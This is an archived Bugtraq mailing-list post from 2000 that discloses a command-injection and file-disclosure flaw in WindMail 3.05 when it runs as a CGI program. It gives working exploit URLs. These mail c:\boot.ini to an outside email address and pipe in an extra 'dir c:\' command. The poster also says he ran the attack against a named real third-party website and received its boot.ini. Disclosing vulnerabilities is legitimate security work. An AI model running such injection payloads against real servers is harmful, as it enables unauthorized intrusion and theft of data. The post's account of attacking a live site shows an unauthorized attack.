[14426] in bugtraq
Windmail allow web user get any file
daemon@ATHENA.MIT.EDU (Frankie Zie)
Tue Mar 28 00:30:30 2000
Message-Id: <20000325224146.6839.qmail@securityfocus.com>
Date: Sat, 25 Mar 2000 22:41:46 -0000
Reply-To: Frankie Zie <frankie@CNNS.NET>
From: Frankie Zie <frankie@CNNS.NET>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
I found some vulnerabilities if windmail run as a CGI
application.tested On WindowsNT 4.0, Windmail 3.05
successfully.
WindMail is a 32-bit Windows console program by geocel that
gives you command-line e-mail messaging capability.
You can download an evaluation copy of WindMail 3.0 at:
http://www.geocel.com/download/wmail301e.exe
WindMail has a feature that allow Mail HTML form results
from CGI scripts
I found windmail doesn't check either attachment file or
special character for parameters, that allow you execute
arbitrary command which web user can do:
http://xx.com/cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
20yourmail@mail.com%20|%20dir%20c:\
After the request, windmail will send c:\boot.ini to
yourmail@mail.com and execute "dir c:\" command.
For example:
http://www.metro.net/cgi-bin/windmail.exe?-n%20c:\boot.ini%
20chinahack@163.net
After a while, check chinahack@163.net, i got a copy of
boot.ini from www.metro.net
pp@cnns.net
http://www.cnns.net
